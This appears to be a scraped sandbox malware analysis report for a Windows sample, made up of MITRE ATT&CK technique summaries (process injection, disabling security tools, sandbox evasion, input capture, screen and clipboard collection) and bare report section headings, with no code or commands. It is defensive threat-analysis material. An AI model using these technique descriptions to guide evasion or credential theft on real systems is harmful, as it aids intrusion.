Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report xuXIetZvv6.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Static AutoHotKey Info

General

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre